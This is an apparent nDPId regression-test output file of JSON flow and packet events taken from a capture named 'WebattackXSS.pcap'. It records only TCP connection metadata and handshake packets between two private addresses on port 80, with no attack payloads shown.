+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347151520,"flow_last_seen":1499347151520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347151520,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1499347151520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347151520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82ilAAD4G66asEAABwKgKMtOEAFDVpkFaAAAAAKACchDXgQAAAgQFtAQCCAoBOZtzAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1499347151520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347151520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ04RMTDZ61aZBW6AScSDkzQAAAgQFtAQCCAoD42zpATmbcwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":3,"flow_last_seen":1499347151521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347151521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02ipAAD4G662sEAABwKgKMtOEAFDVpkFbTEw2e4AQAOWD1QAAAQEICgE5m3MD42zp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347152786,"flow_last_seen":1499347152786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347152786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1499347152786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347152786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lJhAAD4GMTisEAABwKgKMtOSAFAXpgg3AAAAAKACchDNWwAAAgQFtAQCCAoBOZyvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1499347152786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347152786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ05Ji9R5fF6YIOKAScSDa3AAAAgQFtAQCCAoD424mATmcrwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1499347152787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347152787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lJlAAD4GMT+sEAABwKgKMtOSAFAXpgg4YvUeYIAQAOV55AAAAQEICgE5nK8D424m"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347155346,"flow_last_seen":1499347155346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347155346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1499347155346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347155346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8btxAAD4GVvSsEAABwKgKMtOsAFCnAfHzAAAAAKACchBRqQAAAgQFtAQCCAoBOZ8vAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1499347155346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347155346,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ06xcmZfGpwHx9KAScSDpngAAAgQFtAQCCAoD43CmATmfLwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1499347155347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347155347,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bt1AAD4GVvusEAABwKgKMtOsAFCnAfH0XJmXx4AQAOWIpgAAAQEICgE5ny8D43Cm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347156630,"flow_last_seen":1499347156630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347156630,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1499347156630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347156630,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OChAAD4GjaisEAABwKgKMtO6AFAdhZhYAAAAAKACchAzcgAAAgQFtAQCCAoBOaBwAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1499347156630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347156630,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ07o+DQO9HYWYWaAScSB8vAAAAgQFtAQCCAoD43HnATmgcAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1499347156631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347156631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OClAAD4Gja+sEAABwKgKMtO6AFAdhZhZPg0DvoAQAOUbxAAAAQEICgE5oHAD43Hn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347159323,"flow_last_seen":1499347159323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347159323,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1499347159323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347159323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ly1AAD4GlqOsEAABwKgKMtPUAFBviYw8AAAAAKACchDqzgAAAgQFtAQCCAoBOaMRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1499347159323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347159323,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ09Q7Unbob4mMPaAScSDBBwAAAgQFtAQCCAoD43SIATmjEQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1499347159323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347159323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ly5AAD4GlqqsEAABwKgKMtPUAFBviYw9O1J26YAQAOVgDgAAAQEICgE5oxID43SI"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347160581,"flow_last_seen":1499347160581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160581,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1499347160581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347160581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eT9AAD4GTJGsEAABwKgKMtPiAFBG+91zAAAAAKACchDA3AAAAgQFtAQCCAoBOaRMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1499347160581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347160581,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0+J0ull0RvvddKAScSB55wAAAgQFtAQCCAoD43XCATmkTAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1499347160582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347160582,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eUBAAD4GTJisEAABwKgKMtPiAFBG+910dLpZdYAQAOUY7wAAAQEICgE5pEwD43XC"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347163177,"flow_last_seen":1499347163177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347163177,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1499347163177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YKVAAD4GZSusEAABwKgKMtP8AFCcucZwAAAAAKACchB\/fgAAAgQFtAQCCAoBOabVAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1499347163177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0\/zGVu0LnLnGcaAScSBQzAAAAgQFtAQCCAoD43hLATmm1QEDAwc="} 
